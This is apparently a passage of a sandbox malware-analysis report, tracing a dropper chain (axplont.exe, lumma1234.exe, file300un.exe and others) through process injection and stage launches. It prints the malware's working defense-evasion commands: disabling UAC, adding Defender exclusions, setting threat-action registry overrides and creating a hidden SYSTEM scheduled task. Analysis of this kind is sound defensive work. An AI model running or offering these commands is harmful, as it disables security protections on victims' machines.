PID 3160 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3160 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3160 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3160 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3160 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3160 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3160 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3160 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3260 wrote to memory of 3360 N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3260 wrote to memory of 3360 N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3260 wrote to memory of 3360 N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3260 wrote to memory of 3360 N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3260 wrote to memory of 3360 N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3260 wrote to memory of 3360 N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3260 wrote to memory of 3360 N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3260 wrote to memory of 3360 N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3260 wrote to memory of 3360 N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1392 wrote to memory of 4024 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe
PID 1392 wrote to memory of 4024 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe
PID 1392 wrote to memory of 4024 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe
PID 4024 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe C:\Windows\system32\WerFault.exe
PID 4024 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe C:\Windows\system32\WerFault.exe
PID 4024 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe C:\Windows\system32\WerFault.exe
PID 4024 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe C:\Windows\system32\WerFault.exe
PID 4024 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe C:\Windows\system32\WerFault.exe
PID 4024 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe C:\Windows\system32\WerFault.exe
PID 4024 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe C:\Windows\system32\WerFault.exe
PID 4024 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe C:\Windows\system32\WerFault.exe
PID 4024 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe C:\Windows\system32\WerFault.exe
PID 1392 wrote to memory of 3184 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe
PID 1392 wrote to memory of 3184 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe
PID 2248 wrote to memory of 1548 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\System32\sihclient.exe
PID 2248 wrote to memory of 1548 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\System32\sihclient.exe
PID 2248 wrote to memory of 1548 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\System32\sihclient.exe
PID 1548 wrote to memory of 3708 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\cb560c505ccc4c84a4289a5101821494603febad6b1b665ae74fe9d41fee35dc.exe

"C:\Users\Admin\AppData\Local\Temp\cb560c505ccc4c84a4289a5101821494603febad6b1b665ae74fe9d41fee35dc.exe"

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

"C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe"

C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe

"C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe

"C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe"

C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe

"C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"

C:\Users\Admin\AppData\Roaming\configurationValue\One.exe

"C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"

C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe

"C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe"

C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe

"C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe

"C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe

"C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 5000 -ip 5000

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5000 -s 256

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & del "C:\ProgramData\*.dll"" & exit

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 3260 -ip 3260

C:\Windows\SysWOW64\timeout.exe

timeout /t 5

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3260 -s 264

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 468 -p 3184 -ip 3184

C:\Users\Admin\Pictures\jfwLrbtuGmt3WgBnEjEXTdp4.exe

"C:\Users\Admin\Pictures\jfwLrbtuGmt3WgBnEjEXTdp4.exe" /s

C:\Users\Admin\Pictures\UBjA5DPMgvprl58O4Rm6wkOw.exe

"C:\Users\Admin\Pictures\UBjA5DPMgvprl58O4Rm6wkOw.exe"

C:\Users\Admin\Pictures\H0UVbMblodCc40gmvFoORgyt.exe

"C:\Users\Admin\Pictures\H0UVbMblodCc40gmvFoORgyt.exe"

C:\Windows\System32\sihclient.exe

C:\Windows\System32\sihclient.exe /cv MbyfG1aUrky1RXM+asfYGQ.0.2

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\Pictures\360TS_Setup.exe

"C:\Users\Admin\Pictures\360TS_Setup.exe" /c:WW.Marketator.CPI20230405 /pmode:2 /s /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo=

C:\Program Files (x86)\1717037821_0\360TS_Setup.exe

"C:\Program Files (x86)\1717037821_0\360TS_Setup.exe" /c:WW.Marketator.CPI20230405 /pmode:2 /s /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo= /TSinstall

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Windows\system32\bcdedit.exe

"C:\Windows\system32\bcdedit.exe" /set {bootmgr} flightsigning on

C:\Windows\system32\bcdedit.exe

"C:\Windows\system32\bcdedit.exe" /set flightsigning on

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\system32\regsvr32.exe" /s "C:\Program Files (x86)\360\Total Security\MenuEx64.dll"

C:\Windows\system32\regsvr32.exe

/s "C:\Program Files (x86)\360\Total Security\MenuEx64.dll"

C:\Program Files (x86)\360\Total Security\Utils\PowerSaver.exe

"C:\Program Files (x86)\360\Total Security\Utils\PowerSaver.exe" /flightsigning

C:\Program Files (x86)\360\Total Security\safemon\WscReg.exe

"C:\Program Files (x86)\360\Total Security\safemon\WscReg.exe" /installsrv

C:\Program Files (x86)\360\Total Security\safemon\WscReg.exe

"C:\Program Files (x86)\360\Total Security\safemon\WscReg.exe"

C:\Program Files (x86)\360\Total Security\SoftMgr\EaInstHelper64.exe

"C:\Program Files (x86)\360\Total Security\SoftMgr\EaInstHelper64.exe" /Install_run

C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe

"C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe" /install

C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe

"C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe

/showtrayicon

C:\Program Files (x86)\360\Total Security\safemon\QHWatchdog.exe

"C:\Program Files (x86)\360\Total Security\safemon\QHWatchdog.exe" /install

C:\Program Files (x86)\360\Total Security\safemon\PopWndLog.exe

"C:\Program Files (x86)\360\Total Security\safemon\PopWndLog.exe" /cleantip=1

C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe

"C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe" /ExShowTrayIcon

C:\Windows\SysWOW64\regsvr32.exe

C:\Windows\system32\regsvr32.exe /s "C:\Program Files (x86)\360\Total Security\safemon\safemon.dll"

C:\Program Files (x86)\360\Total Security\safemon\PopWndLog.exe

"C:\Program Files (x86)\360\Total Security\safemon\PopWndLog.exe" /ExShowTrayIcon

C:\Program Files (x86)\360\Total Security\safemon\QHWatchdog.exe

"C:\Program Files (x86)\360\Total Security\safemon\QHWatchdog.exe" /watch

C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe

"C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe"

C:\Program Files (x86)\360\Total Security\modules\KB931125-rootsupd.exe

"C:\Program Files (x86)\360\Total Security\modules\KB931125-rootsupd.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe authroots.sst

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe updroots.sst

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe -l roots.sst

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe -d delroots.sst

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\system32\regsvr32.exe" /s "C:\Program Files (x86)\360\Total Security\safemon\bdfltlib.dll"

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\system32\regsvr32.exe" /s "C:\Program Files (x86)\360\Total Security\safemon\scan.dll"

C:\Users\Admin\Pictures\wD2dhV3FhycNZg6ppID8rOZD.exe

"C:\Users\Admin\Pictures\wD2dhV3FhycNZg6ppID8rOZD.exe"

C:\Users\Admin\AppData\Local\Temp\7zSB35D.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zSB59F.tmp\Install.exe

.\Install.exe /NQHxdidUQs "385118" /S

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bqGGCwwWIommTRgeuN" /SC once /ST 02:58:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSB59F.tmp\Install.exe\" 1g /fJvdidJshn 385118 /S" /V1 /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bqGGCwwWIommTRgeuN"

C:\Windows\SysWOW64\choice.exe

choice /C Y /N /D Y /T 3

C:\Windows\SysWOW64\cmd.exe

/C schtasks /run /I /tn bqGGCwwWIommTRgeuN

\??\c:\windows\SysWOW64\schtasks.exe

schtasks /run /I /tn bqGGCwwWIommTRgeuN

C:\Users\Admin\AppData\Local\Temp\7zSB59F.tmp\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zSB59F.tmp\Install.exe 1g /fJvdidJshn 385118 /S

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t 